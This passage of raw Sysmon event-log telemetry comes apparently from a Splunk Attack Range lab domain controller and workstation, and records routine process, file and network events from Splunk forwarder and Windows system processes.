Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.831{466BC892-F72B-60EB-BD7D-00000000CF01}38529720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCD12EA984FA55C9C1D82F6AF7A337FE,SHA256=E7150F92589B6459151ED34A91130C0674188A8B9A8CBF0A49B7079805DF2317,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809491Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:49.803{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-9237-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809490Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:51.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAA536FBE31282E61280CEE4CCC17831,SHA256=3CBF563C0550FF918BC2D5C9910D353392BC48A398BB25528028DC5AE5BD1A69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.578{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72B-60EB-BD7D-00000000CF01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:51.578{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.578{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:51.578{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.562{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:51.562{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F72B-60EB-BD7D-00000000CF01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.562{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72B-60EB-BD7D-00000000CF01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.564{466BC892-F72B-60EB-BD7D-00000000CF01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.299{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84B1F6BFEEBFF9332B35B384A633E3BB,SHA256=CCA7061F151DE926B6BB426BBA997A566D0E26EBCD7BF5ACD8296F6BE8FF101A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.298{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C48E25A973AF1552D54B61AAC9B0966,SHA256=CAE9C9ACB928036FECF5A32DDD6B956D553CBC77CAC321D32718F365A6AF597D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.616{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51176-false10.0.1.12-8000- 10341000x80000000000000001052819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:52.848{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72C-60EB-BF7D-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.833{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:52.833{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.833{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:52.833{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.833{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F72C-60EB-BF7D-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.833{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72C-60EB-BF7D-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.834{466BC892-F72C-60EB-BF7D-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B127F9C28A70041C09E0163D5F124C55,SHA256=5B3FF8F6AB052D91CDD3A0D9FE5A394DCEE48E3266432962DDD0CFB7399F12BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809492Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:52.486{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DFABBBB7CF601E797AC1EC663495284,SHA256=0116421991400AFC7A4CDD9B4B68E19312B988ED436BA29177A2E2665B6E9E6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.578{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84B1F6BFEEBFF9332B35B384A633E3BB,SHA256=CCA7061F151DE926B6BB426BBA997A566D0E26EBCD7BF5ACD8296F6BE8FF101A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.263{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72C-60EB-BE7D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:52.247{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.247{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:52.247{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.247{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:52.247{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F72C-60EB-BE7D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.247{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72C-60EB-BE7D-00000000CF01}4072C:\Program 